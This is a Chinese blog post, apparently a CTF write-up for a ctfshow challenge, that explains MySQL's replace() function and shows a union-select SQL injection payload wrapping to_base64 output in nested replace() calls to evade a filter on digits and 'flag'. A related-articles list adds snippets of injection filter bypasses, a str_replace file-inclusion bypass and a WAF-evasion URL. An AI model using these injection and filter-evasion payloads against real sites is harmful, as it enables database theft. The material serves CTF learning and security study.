sql replace 绕过

最新推荐文章于 2021-10-25 11:17:08 发布
最新推荐文章于 2021-10-25 11:17:08 发布
阅读量312 收藏
点赞数
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MichealCurry1/article/details/120678354
版权

replace(original-string,search-string,replace-string)

  • original-string: 被搜索的字符串。可为任意长度。 
  • search-string: 要搜索并被 replace-string 替换的字符串。该字符串的长度不应超过 255 个字节。如果 search-string 是空字符串,则按原样返回原始字符串。 
  • replace-string: 该字符串用于替换 search-string。可为任意长度。如果 replace-string 是空字符串,则删除出现的所有 search-string。

 过滤了flag和数字,则考虑将数字替换为其他值

初始:

1' union select username,password from ctfshow_user4 where username='flag' --

将username替换为

replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(username),'0','nmA'),'1','nmB'),'2','nmC'),'3','nmD'),'4','nmE'),'5','nmF'),'6','nmG'),'7','nmH'),'8','nmI'),'9','nmJ')

将password替换为

replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),'0','nmA'),'1','nmB'),'2','nmC'),'3','nmD'),'4','nmE'),'5','nmF'),'6','nmG'),'7','nmH'),'8','nmI'),'9','nmJ')

得到结果

YnmDRmcnmChvdnmDsxNzQwNjJjMynmBiYWQnmELTRkYnmCItYWQnmBYSnmAnmBZjkxODNiYWIyYTdnmJ

以此替换回去即可得到结果

fippyFish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP CTF常见考题的绕过技巧
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
php str_replace的替换漏洞
10-30
php 的函数str_replace替换漏洞
对字符进行修改从而绕过
E1even的博客
12-24 223
基于代码审计和部分sql相关的绕过: or || % ^ 0b ~~ 题目类型如下: 以下分为6个方式来讨论该类型: 第一题:无绕过 对代码进行分析:需要GET一个ID<999的参数,但是flag需要id=1000才能获取。这里我们还可以看到他执行的是SQL语句,因此大概率是SQL注入。 我们随便输入一些ID的值得到以下内容: ID=1 ID=2 为什么ID=2之后都没有结果呢?当然是因为数据库里面查询不到这个值,而学习过SQL注入的同学应该知道,order by 字段与 union selec
过滤绕过
L6y1a
02-04 340
过滤+绕过整理 1.如果空格被过滤,括号没有被过滤,可以用括号绕过–>括号的两端,可以没有多余的空格 ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23 ?id=1’and(sleep(ascii(mid(database()from(1)for(1)))=109))# 没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时 2.如果引号被注释,就可以通过十六进制绕过 =“users”
replace()函数的用法
热门推荐
alongwaywith的博客
12-20 4万+
replace ()的大概用法是这样的: str.replace(old, new[, max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数 举个例子: str = "我把你当亲兄弟对待,而你却像对待爸爸一样对待我?这是为什么?????"; print( str.replace("爸爸", "爷爷")) print(str.replace("?", ":", 3)) 注意的是,如果需要替换的不存在,那么就输出本来的样子 max的次数可以不一定要达到,但是超过了,就不会
第十七节 绕过剔除空格的SQL注入-01
09-15
"绕过剔除空格的SQL注入" 绕过剔除空格的SQL注入是Web应用安全中的一种常见攻击方式。SQL注入攻击是指攻击者将恶意的SQL代码注入到Web应用的数据库中,以获取或修改敏感数据。在本节课程中,我们将介绍绕过剔除空格...
第十八节 绕过去除注释符的SQL注入-01
09-15
SQL注入攻击绕过注释符的安全风险 SQL注入攻击是Web应用程序中最常见的安全风险之一,而绕过注释符的SQL注入攻击则是其中一种非常危险的攻击方式。在本资源中,我们将详细介绍Mysql中的注释符、去除注释符的代码...
第十六节 绕过剔除and和or的SQL注入-01
09-15
绕过剔除and和or的SQL注入 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中插入恶意SQL代码来访问或修改数据库中的敏感信息。为了防止SQL注入,开发者需要对用户输入进行严格的验证和过滤。...
第十八节 绕过剔除黑名单(union和select)的SQL注入-01
09-15
绕过剔除黑名单(union和select)的SQL注入 SQL注入是一种常见的Web应用安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来获取敏感数据或控制数据库。绕过剔除黑名单(union和select)的SQL注入是SQL注入攻击...
SQL_BypassWaf.pdf
04-08
SQL注入与WAF绕过SQL注入是一种常见的网络安全攻击手法,通过在应用程序的输入字段中插入恶意SQL代码,以获取、修改、删除数据库中的数据。而WAF(Web Application Firewall)则是为了防止这种攻击而设立的一道...
命令执行漏洞的利用以及绕过方式
cosmoslin的博客
09-14 1924
命令执行漏洞的利用以及绕过方式 1 preg_match()函数 preg_match 函数用于执行一个正则表达式匹配。 int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数 说明 $pattern 要搜索的模式,字符串形式 $subject 要搜索检测的目标字符串 $matches 如果提供了参数
文件包含漏洞之——str_replace函数绕过与——包含截断绕过
温柔小薛的博客
04-08 6421
str_replace函数绕过 实验环境DVWA,安全性medium 有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过 绕过方法 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103...
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5749
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
CTF命令执行及绕过技巧
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
高级SQL注入:混淆和绕过
kezhen的专栏
08-11 1909
#############  【0×00】 – 简介  【0×01】 – 过滤规避(Mysql)  【0x01a】 – 绕过函数和关键词的过滤  【0x01b】 – 绕过正则表达式过滤  【0×02】 – 常见绕过技术  【0×03】 – 高级绕过技术  【0x03a】 – HTTP参数污染:分离与结合  【0x03b】 – HTTP参数参杂  【0×04】 – 如何保护你的
SQL篇之SQL注入绕过姿势总结
zkaqlaoniao的博客
10-25 1672
目录 1.注释符绕过 2.大小写绕过 3.内联注释绕过 4.双写关键字绕过 5.特殊编码绕过 6.空格过滤绕过 7.过滤or and xor(异或)not 绕过 8.过滤等号=绕过 9.过滤大小于号绕过 10过滤引号绕过 11.过滤逗号绕过 12.过滤函数绕过 13.缓冲区溢出 1.注释符绕过 常用的注释符有: 1)--注释内容 2)#注释内容 3)/*注释内容*/ eg:union select 1,2# union select 1,2 --+ 构造闭...
曾经跳过的坑------replace、替换斜杠反斜杠、时间格式化处理
anxingshe3043的博客
06-08 705
JAVA 中: 坑一:  replace没有用对象进行接收。直接使用  dateStr.replaceAll("\\/", "-");  是不行的,至少得加上 "dateStr = " 。坑二:  正则匹配斜杠  \\d{4}\\\\\\d{1,2}\\\\\\d{1,2} 2016\05\05   中间得加6个斜杠转义。自行体会吧,都是泪啊,太隐蔽了……坑三:  测试的时候没有...
sql注入绕过防火墙
最新发布
12-01
为了绕过防火墙的SQL注入,可以使用一些技巧和方法,例如: 1. 双写绕过:在SQL注入语句中,将关键字双写,例如将SELECT写成SSELECT,将UNION写成UUNION,这样可以绕过一些简单的防火墙。 2. 使用特殊字符:在SQL注入语句中,使用一些特殊字符来绕过防火墙,例如使用/**/来代替空格,使用%23来代替#号,使用%20来代替空格等。 3. 使用编码:在SQL注入语句中,使用编码来绕过防火墙,例如使用URL编码或者Unicode编码来绕过防火墙。 4. 使用盲注:如果以上方法都无法绕过防火墙,可以考虑使用盲注来进行SQL注入攻击,通过不断尝试不同的注入语句来获取数据。 下面是一个使用双写绕过的例子: ```sql http://victim.com/news.php?id=1+UUNIONN+SSSELECTECT+1,2,3-- ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值